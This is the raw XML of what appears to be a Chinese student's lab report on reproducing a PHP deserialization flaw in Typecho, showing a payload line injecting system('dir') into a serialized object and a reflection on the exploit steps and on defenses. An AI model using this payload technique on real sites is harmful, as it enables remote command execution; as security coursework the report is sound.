        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>再尝试将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>exp.php 执行代码那一行替换为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4C0AF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$this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>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="37352F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>_params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[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'screenName'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 xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="9A6E3B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ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="669900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"system('dir');"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592F90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操作同上，成功执行，结果如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381FCB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1940" cy="1618615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="局部截取_20250605_19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局部截取_20250605_193540"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect l="11195" t="12695" r="11147" b="5997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455F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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可见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system('dir'); 的执行同样成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，这样就完成了复现反序列化漏洞，并执行其他的系统命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA2FD8"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 w14:paraId="485601E6">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:t>通过本次反序列化漏洞复现实验，我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>学习</w:t>
      </w:r>
      <w:r>
        <w:t>掌握了PHP反序列化漏洞的原理与操作流程。实验中，首先创建包含反序列化逻辑的typecho.php文件，其中通过unserialize函数对用户可控参数进行处理，触发对象魔术方法的执行；接着编写exp.php生成携带恶意代码的序列化Payload，利用assert函数执行phpinfo()等命令。在复现过程中，遇到了因Typecho_Feed类的__toString方法未返回字符串导致的报错问题，通过添加返回值和类型校验解决了该问题，成功执行了文件创建、系统命令查看等操作。通过此次实践，我不仅理解了反序列化漏洞利用中对象构造、魔术方法调用、Payload生成的关键环节，还认识到PHP配置中禁用危险函数的重要性，以及开发中对输入数据严格过滤、确保方法返回值合规的必要性，这些经验对提升代码安全性和漏洞防范意识具有重要意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-Bold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UI-Bold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E0C7A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="079E0C7A"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1．"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="-560"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="73BB83F6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="73BB83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1D9415D"/>
    <w:rsid w:val="04333FF8"/>
    <w:rsid w:val="0ACB4562"/>
    <w:rsid w:val="0C5D7564"/>
    <w:rsid w:val="12492C39"/>
    <w:rsid w:val="1AAB0138"/>
    <w:rsid w:val="1FE91339"/>
    <w:rsid w:val="2A240F4F"/>
    <w:rsid w:val="2AB80146"/>
    <w:rsid w:val="30C44C4C"/>
    <w:rsid w:val="36A302BA"/>
    <w:rsid w:val="3BC91D58"/>
    <w:rsid w:val="57ED4158"/>
    <w:rsid w:val="62BD60DC"/>
    <w:rsid w:val="6B41497B"/>
    <w:rsid w:val="6D6668C3"/>
    <w:rsid w:val="729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81</Words>
  <Characters>95</Characters>
  <Lines>2</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>36</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>107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WPS_1701907429</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-05T11:38:45Z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eyJoZGlkIjoiZjFmZWIzNDg2MmIzZjExOTIzMmViNTBmYTMwYTk0ZWYiLCJ1c2VySWQiOiIxNTY3MDU5MTI0In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.21171</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>B1D6B6B7DBC3473EB8A9DF8B68888C6D_12</vt:lpwstr>
  </property>
</Properties>
</file>